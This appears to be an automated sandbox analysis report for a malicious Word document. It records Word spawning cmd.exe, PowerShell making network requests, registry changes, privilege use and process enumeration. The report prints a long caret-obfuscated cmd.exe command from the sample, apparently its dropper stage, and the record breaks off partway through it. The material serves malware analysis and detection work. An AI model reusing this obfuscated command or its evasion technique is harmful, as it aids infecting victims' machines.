memory/3492-546-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-547-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-548-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
memory/3492-568-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-569-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-571-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-570-0x00007FFBD62B0000-0x00007FFBD62C0000-memory.dmp
memory/3492-572-0x00007FFC16230000-0x00007FFC16425000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-29 01:33
Reported
2024-05-29 01:35
Platform
win7-20240221-en
Max time kernel
122s
Max time network
123s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7f17eb24b25d4c3e5012c7c5e38786ee_JaffaCakes118.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\cmd.exe
cmd /V/C"^s^e^t ^f^i=^Y^95^ ^s^:^&^ ^S^dc^ V^6v^ ^x^Q(^ ^2^>^`^ r^F^] ^w^f^Q^ g^t^Z^ ^h^Z^Y^ ^A^K^u^ ^{(^F^ ^x^*^7^ N^,^q^ ^j#^G^ ^j^Zr^ ^H^.^ ^Xk^p^}^$^\R^}^;^g^u^{^-q^{h^i^+^yc^A^7^?^t^T^K^2^a^B^O)c^[^l^X^}^A^5n^;^QN^A^k^\^`^Z^a^>(^K^e^#^0/rDr^K^b^6^?^>^;^+^A^Jc^:^H^Bz)^*%^q^*^O^?^$)^a^~^ E^sy^m^*^&^b^e^T^As^t^6^d^K^I^&^K^H^-^&^Q^e^e^t^}^h^k^T^y^b^o^acvv^[R^`n^m^+^d^I^B^D7^;^U^{^7)^j^*^>c^=^0^_^z^Y^3%^q%^l^}^$^P^D^I^ ^,^L^@^,c^'^D^j^+C^f^dA(^7^f^X^F^|$^k^]E(^f^BR^e^Qn^H^l^w^0^K^i^8^*^I^F^7^ ^`^d^>^i^6^a^M^F^P^o^T^k^q^lk^7^Sn^h^]^L^w^EV^X^o^&^=^m^D^}^K^g^.^:l^|n^E^a^eb^.^J^>E^D^P^e^$^J^?v^{^gF^e^yn^`^Or^A^W^*^tx^G^g^{^G^o^<)^&N^7^G^ ^9^D^K^3^b^p^t^6^3^s^$^k^@^, ^\^Q^4n^?^]^T^iN^W^2^ ^k^Q^&j^F^W^a^d^q^L^w^fC^7^_^$}^_^G(,^k^5^h^ADEc^5/^ ^a^ZV^>^e^m^[^<r^-^d^{^o^~^?^W^f^s^`(^;P^OF'%^27^e^s^\^P^x^4^+^1e^6^}x^.^p^6^\^'^?^}^u^+^p^F^l^M^Xng^K^\^Z^E^I'^=^Q$^b^D^h^+^qV^~^'^A^7^ ^\r^9^p^'^+2v^+^GV^acZ^.^W^i^s^8^]^l^X^{^:b^A^k^,^uC^[^_^p^h^.^I^:^81^Ov^w^4^3n^p^j^z^es^~^I^$^PcV^=^W^B^jcn%^W^z(^w,^q^w^Y^9^$^ur^{^;^ZIp'^O^_c^4^q^g^J3^+^:^m^1^>^5^{^'X^H^Q^ ^q^X^B^=^S^]^f^ ^KV^u^Mr^8^x^K^j^0^Q^I^4^{^1$^=^|(^;^m^8r)^]^TW^'^A^y^w^@^q^h^0^'^q^8)(F^i^p^t^HC^z^i^*^@m^l^z/^}^p^0^*^dS^_^s^~^.^<^>^*^'^|^D^:^q^KC^=^Fv^#}^M^P^K^FH^P^\^@^oh^6^w^a^+^=^q^d^X^pc^w^5^s)^8^ ^u^S/^\^9^0^m^5nC^o^w%^gcVM^+^.^O^>^t^t^m^F1^eu^]^j^i^z^6^yv,^P)n^Z^M^x^aSJ^m^s^l^t^x^m^br^q^a^Iz^M^l^o^'(/^Zl^q/K^MW^:,^0^_^p^?^Z^ut^Z^D^Bt^g^o^{^h^~^|^8^@r^$^>^O^k^f^jI^w^L^F^4^H^Q^bCn^h^Q^3^m^'^PN^k^8^Z^K_^D^d/^z^H^I^oN^i^T^f^t^H^mnc^q^\^i^}^ g^.^AE^#h^X^y^pk^a^i^E^i^\^D^I^e^l^#^<^h^]^e^T^sU^Q^J^h^.^L^8^a^-^@^]^l^?/vl^=^P^,^ur^;^T^d^}^d^T^b^G5^b^aVv*/^=^E^./^d^]^ 
